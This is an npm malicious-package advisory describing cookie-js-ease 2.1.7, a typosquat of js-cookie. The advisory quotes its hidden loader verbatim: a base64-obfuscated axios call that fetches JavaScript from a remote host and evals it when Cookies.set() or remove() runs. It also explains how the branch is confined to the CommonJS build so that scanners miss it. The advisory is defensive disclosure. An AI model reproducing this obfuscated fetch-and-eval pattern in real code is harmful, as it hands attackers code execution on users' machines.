npm · Malicious package advisory
Malwarecookie-js-ease
MAL-2026-10058
Malicious code in cookie-js-ease (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2908ef4ab9f019d4675b39066f876acb959cd9814b47bb66f8f4554c517abe0d)
cookie-js-ease@2.1.7 impersonates the popular js-cookie library (same repository URL, banner comment, API surface, and reused upstream author name 'Klaus Hartl') but adds axios and request as runtime dependencies and injects a remote-code-execution branch into the CommonJS build referenced by the package's main entry (dist/cookie.ease.js). When a consumer calls Cookies.set()/remove() in a Node.js context (or with expires==0), the code executes require('axios').get(atob('aHR0cHM6Ly9jb29raWUtYXBpLXR3by52ZXJjZWwuYXBwLw')).then(r => { eval(r.data.content) }) — fetching JavaScript from https://cookie-api-two.vercel.app/ and eval'ing the response body inside the installer's Node process. The destination URL is base64-obfuscated via atob() to evade static scanners. The.mjs and.min.js variants do not contain this branch, so the payload is targeted specifically at CommonJS consumers. This is unambiguous typosquat-plus-RCE: consumers who mistype js-cookie and reach for this package receive attacker-controlled code execution on first use of the library's core API.
Compromised versions (1)
- 2.1.7
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.